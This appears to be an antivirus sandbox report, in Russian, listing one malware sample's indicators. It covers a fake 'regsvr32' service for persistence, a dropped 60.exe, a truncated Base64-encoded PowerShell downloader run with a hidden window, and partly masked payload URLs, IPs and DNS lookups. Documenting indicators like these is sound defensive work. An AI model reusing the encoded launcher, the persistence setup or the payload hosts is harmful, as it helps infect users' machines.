Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\regsvr32] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\regsvr32] 'ImagePath' = '"%WINDIR%\SysWOW64\KBDEST\regsvr32.exe"'
- 'regsvr32' "%WINDIR%\SysWOW64\KBDEST\regsvr32.exe"
- 'regsvr32' %WINDIR%\SysWOW64\KBDEST\regsvr32.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB6AGUAYQB2AGgAbwBvAHcAcABhAHQAdABhAHUAbAA9ACcAdABhAG8AdgBqAG8AeAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAQwB1AHIASQBUAGAAeQBQAHIAYABvAHQAYABPAE...
- %HOMEPATH%\60.exe
- %WINDIR%\syswow64\kbdest\regsvr32.exe
- %HOMEPATH%\60.exe в %WINDIR%\syswow64\kbdest\regsvr32.exe
- '24.##9.135.121':80
- '18#.#4.252.13':443
- http://ri###ahl.com/wp-includes/Z8eS6748/
- http://www.gv##tz.com/4LH419348/
- http://in###mal.com/eazylot.com/zy/
- http://he##eli.com/I1259/
- http://ro####sinclair.net/videos/5789/
- http://18#.##.252.13:443/MH8gHIkMbBle/ via 18#.#4.252.13
- DNS ASK ri###ahl.com
- DNS ASK gv##tz.com
- DNS ASK in###mal.com
- DNS ASK he##eli.com
- DNS ASK we##uset.no
- DNS ASK ro####sinclair.net
- '%HOMEPATH%\60.exe'
- '%WINDIR%\syswow64\kbdest\regsvr32.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB6AGUAYQB2AGgAbwBvAHcAcABhAHQAdABhAHUAbAA9ACcAdABhAG8AdgBqAG8AeAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAQwB1AHIASQBUAGAAeQBQAHIAYABvAHQAYABPAE...' (со скрытым окном)